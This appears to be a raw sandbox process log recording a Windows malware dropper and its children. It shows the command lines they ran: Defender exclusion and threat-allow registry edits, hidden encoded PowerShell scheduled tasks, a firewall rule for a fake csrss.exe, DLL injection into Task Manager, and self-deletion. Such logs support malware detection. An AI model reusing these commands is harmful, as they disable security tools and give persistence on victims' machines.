C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe

"C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3156 -ip 3156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 864

C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3868 -ip 3868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1172

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --silent --allusers=0

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3208 -ip 3208

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e82e1a8,0x6e82e1b4,0x6e82e1c0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 532

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe" --version

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3460 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142125" --session-guid=77820e10-ad15-4e06-bd77-7e7f60bb5f81 --server-tracking-blob=YmViMGExMDNhN2QzMDlmMGFkNDI4OWU5ZWQ3M2UzOTA3ZDVjN2Y5YmU4YTFiOTFmMjg4MGViNDViYTk1N2YwYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2NzkuNTQ4MCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM5MmMwYWFkLTYxNTgtNGE5ZS1hY2IzLTM4ZGRjNmJjZTFiYyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3208 -ip 3208

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b0,0x2c0,0x2c4,0x28c,0x2c8,0x6deae1a8,0x6deae1b4,0x6deae1c0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 528

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3752 -ip 3752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 1164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe

"C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe"

C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe

"C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe"

C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe

"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"

C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe

"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"

C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe

"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe

"C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gVeYmuPuD" /SC once /ST 07:55:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gVeYmuPuD"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1308 -ip 1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 3444

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe

"C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNQTYWcCe" /SC once /ST 13:59:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNQTYWcCe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xd50040,0xd5004c,0xd50058

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gVeYmuPuD"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ntdxxty.exe\" id /Itsite_idoir 385118 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gNQTYWcCe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe\" id /KZsite_idnXc 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe id /KZsite_idnXc 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

